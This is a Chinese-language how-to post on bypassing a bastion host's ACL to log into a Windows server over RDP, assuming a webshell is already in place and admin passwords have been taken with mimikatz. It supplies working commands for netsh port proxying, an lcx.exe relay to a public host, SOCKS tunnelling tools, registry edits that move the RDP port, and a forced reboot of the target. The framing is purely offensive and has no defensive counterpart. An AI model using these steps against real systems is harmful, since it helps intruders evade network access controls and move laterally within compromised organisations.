1. 程式人生 > 實用技巧 >如何繞過堡壘機遠端登入

如何繞過堡壘機遠端登入

假設一個場景:在Webshell中執行mimikatz獲取到win管理員密碼,並且本地檢視埠3389是開放的,可是從當前跳板機無法遠端到目標機器。因為某個特定需求,一定要遠端登入到這臺win伺服器,這時該怎麼辦?

首先我們先分析一下這個場景,埠開放卻無法連線,最有可能的情況,就是到達目標網段受到ACL策略限制,只允許通過特定網段登入,比如說堡壘機。大多數堡壘機部署時,為了不改變現有的網路拓撲結構,採用旁路部署的方案,通過ACL策略限制使用者訪問特定埠。

那麼,我們就可以用另一種方式來描述這個問題:目標伺服器遠端埠受到ACL限制,但其他埠沒有限制,那麼,最簡單的解決方式就可以通過埠轉發來繞過。


1、使用netsh命令進行埠轉發

Windows自帶的netshnetsh實現埠轉發,監聽12345埠,轉發到本地3389埠,可繞過訪問策略限制。

#A、3389埠轉發到12345埠
netsh interface portproxy add v4tov4 listenaddress=192.168.126.32 listenport=12345 connectaddress=192.168.126.32 connectport=3389

#B、檢視配置好的埠對映清單
C:\Windows\system32>netsh interface portproxy show v4tov4

偵聽 ipv4:                 連線到 ipv4:

地址            埠        地址            埠
--------------- ---------- --------------- ---------- 192.168.126.32 12345 192.168.126.32 3389

這樣一來,通過攻擊機跳板機直接遠端目標機器的12345埠,就可以實現遠端登入。

2、LCX 埠轉發

在目標機器上執行:lcx.exe -slave 公網ip 51 內網ip 3389
在公網的機器執行:Lcx.exe –listen 51 3340

本地機器上連線 127.0.0.1:3340,即可連線上目標機器的3389。

3、內網穿透工具

SOCKS代理,如Ngrok、frp、EW、reGeorg、sSocks等

通過利用SOCKS協議,結合Proxifier使用,可實現mstsc登入目標主機。

4、修改Windows遠端桌面埠

通過修改Windows預設遠端桌面埠,從而繞過ACL策略訪問限制。

修改登錄檔,命令如下:

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v "PortNumber" /t REG_DWORD /d 12345/f
REG ADD "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 12345 /f

強制重啟目標伺服器後,登錄檔生效。

shutdown -r -t 0

此時,就可以遠端目標伺服器的12345登入。